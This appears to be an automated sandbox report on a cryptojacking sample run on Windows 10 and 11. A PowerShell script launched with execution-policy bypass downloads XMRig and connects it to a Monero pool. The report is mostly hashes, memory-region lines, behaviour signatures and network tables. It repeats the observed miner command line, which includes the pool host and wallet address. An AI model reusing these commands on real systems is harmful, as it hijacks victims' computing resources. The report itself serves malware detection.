| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4192-11-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-12-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-14-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4192-15-0x0000024AAC6B0000-0x0000024AAC6C2000-memory.dmp
memory/4192-16-0x0000024AABB20000-0x0000024AABB2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4664-47-0x000001B6B52E0000-0x000001B6B5300000-memory.dmp
memory/4664-48-0x000001B6B6CD0000-0x000001B6B6CF0000-memory.dmp
memory/4664-49-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4192-50-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4664-52-0x000001B6B6D10000-0x000001B6B6D30000-memory.dmp
memory/4664-51-0x000001B6B6CF0000-0x000001B6B6D10000-memory.dmp
memory/4192-54-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp
memory/4664-53-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-55-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4192-56-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp
memory/4664-59-0x000001B6B6D10000-0x000001B6B6D30000-memory.dmp
memory/4664-58-0x000001B6B6CF0000-0x000001B6B6D10000-memory.dmp
memory/4664-57-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-60-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-61-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-62-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-63-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-64-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-65-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-66-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-67-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-68-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-69-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-70-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-71-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-72-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-73-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-74-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-75-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-76-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-77-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-78-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-79-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-80-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-81-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-82-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-83-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-84-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-85-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-86-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-87-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-88-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-89-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-90-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-91-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-92-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-93-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-94-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-95-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-96-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-97-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-98-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-99-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-100-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-101-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-102-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-103-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-104-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-105-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-106-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-107-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-108-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-109-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-110-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-111-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-112-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-113-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-114-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-115-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-116-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-117-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
memory/4664-118-0x00007FF7A5290000-0x00007FF7A5EC3000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2196 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2196 wrote to memory of 2032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2196-3-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp
memory/2196-5-0x0000017D7F4B0000-0x0000017D7F4D2000-memory.dmp
memory/2196-6-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-9-0x0000017D7F6B0000-0x0000017D7F726000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ft0wny1j.stu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2196-10-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-25-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-48-0x0000017D7F670000-0x0000017D7F682000-memory.dmp
memory/2196-61-0x0000017D7F500000-0x0000017D7F50A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2032-90-0x000001E3DD110000-0x000001E3DD130000-memory.dmp
memory/2032-91-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2196-92-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2196-94-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp
memory/2032-93-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2196-95-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp
memory/2032-96-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-97-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-98-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-99-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-100-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-101-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-102-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-103-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-104-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-105-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-106-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-107-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-108-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-109-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-110-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-111-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-112-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-113-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-114-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-115-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-116-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-117-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-118-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-119-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-120-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-121-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-122-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-123-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-124-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-125-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-126-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-127-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-128-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-129-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-130-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-131-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-132-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-133-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-134-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-135-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-136-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-137-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-138-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-139-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-140-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-141-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-142-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-143-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-144-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-145-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-146-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-147-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-148-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-149-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-150-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-151-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-152-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-153-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-154-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-155-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
memory/2032-156-0x00007FF7FA2A0000-0x00007FF7FAED3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:12
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3988 wrote to memory of 1020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3988 wrote to memory of 1020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3988-0-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dkspi5bv.zps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3988-10-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-9-0x000001B03B4E0000-0x000001B03B502000-memory.dmp
memory/3988-11-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-12-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/3988-14-0x000001B03B590000-0x000001B03B5A2000-memory.dmp
memory/3988-15-0x000001B03B570000-0x000001B03B57A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1020-46-0x000001E6BF0C0000-0x000001E6BF0E0000-memory.dmp
memory/1020-47-0x000001E6BF120000-0x000001E6BF140000-memory.dmp
memory/1020-48-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/3988-49-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
memory/1020-50-0x000001E752E40000-0x000001E752E60000-memory.dmp
memory/1020-51-0x000001E753070000-0x000001E753090000-memory.dmp
memory/1020-52-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/3988-53-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1020-54-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-55-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-56-0x000001E752E40000-0x000001E752E60000-memory.dmp
memory/1020-57-0x000001E753070000-0x000001E753090000-memory.dmp
memory/1020-58-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-59-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-60-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-61-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-62-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-63-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-64-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-65-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-66-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-67-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-68-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-69-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-70-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-71-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-72-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-73-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-74-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-75-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-76-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-77-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-78-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-79-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-80-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-81-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-82-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-83-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-84-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-85-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-86-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-87-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-88-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-89-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-90-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-91-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-92-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-93-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-94-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-95-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-96-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-97-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-98-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-99-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-100-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-101-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-102-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-103-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-104-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-105-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-106-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-107-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-108-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-109-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-110-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-111-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-112-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-113-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-114-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-115-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
memory/1020-116-0x00007FF680AC0000-0x00007FF6816F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win11-20240611-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
